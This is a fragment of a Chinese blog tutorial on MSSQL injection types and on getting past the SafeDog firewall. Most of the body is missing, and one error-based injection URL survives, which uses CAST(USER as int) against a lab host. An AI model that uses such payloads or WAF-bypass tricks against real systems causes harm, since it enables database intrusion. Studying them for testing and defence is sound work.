mssql基础(三)——mssql注入+简单绕过注入+bypass安全狗

本文介绍了MSSQL注入的三种类型:布尔盲注、时间盲注和联合注入,并提供了实例。同时,针对安全狗的防护,探讨了如何通过CAST、CONVERT函数以及声明变量的方式简单绕过注入限制。最后,展示了如何在安全狗开启的情况下,通过注释、换行和储存过程等方法Bypass安全狗。
摘要由CSDN通过智能技术生成

1.注入类型

验证如下:

验证如下:

注:一般不使用 数字占位,而是null,因为数字占位可能会发生隐式转换

用法有以下几种:

2.简单绕过注入

  • 报错注入类型语法:

                                   CAST( expression AS data_type )

                                   CONVERT(data_type[(length)], expression [, style]

http://192.168.232.174/test.aspx?id=1; select * from admin where id =1 (select CAST(USER as int))

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值